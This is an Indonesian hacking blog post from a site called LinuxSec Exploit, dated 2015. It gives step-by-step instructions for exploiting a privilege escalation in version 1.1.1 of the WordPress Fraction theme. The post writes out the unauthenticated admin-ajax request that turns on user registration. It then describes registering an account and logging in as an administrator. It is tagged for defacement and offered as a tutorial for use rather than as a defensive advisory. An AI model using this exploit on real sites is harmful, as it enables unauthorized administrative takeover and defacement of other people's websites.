• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

March 11, 2015 by Jack Wilder Leave a Comment

Exploit nya masih anget kak :p . Baru kemaren dirilis di 1337day. Oke langsung saja ya alat dan bahan nya :3
Google Dorks : —

Vulnerability : /fraction-theme/functions/ajax.php

How to Exploit :
localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1
Jika fitur register sebelumnya dilarang, dengan command ini maka fitur register akan dibuka secara ilegal.

Habis itu, buka localhost/wordpress/wp-login.php?action=register

Cek email, masukin user dan password, logged to dashboard as Admin 🙂

Sekian tutor kali ini semoga bermanfaat.

Filed Under: WordPress Exploit Tagged With: Deface, Exploit, Hacking

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Deteksi Kerentanan Execution After Redirect (EAR)

Laravel PHPUnit Remote Code Execution

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Open Redirect Bypass Cheat Sheet

Shopify Custom Domain or Subdomain Takeover

Cara Mudah Hack cPanel dengan Fitur Reset Password

FastMail Custom Domain or Subdomain Takeover

Uptimerobot.com Custom Domain or Subdomain Takeover

Heroku Custom Domain or Subdomain Takeover

Hack Targeted Website using Reverse IP

LinuxSec / 14 queries in 0.12 seconds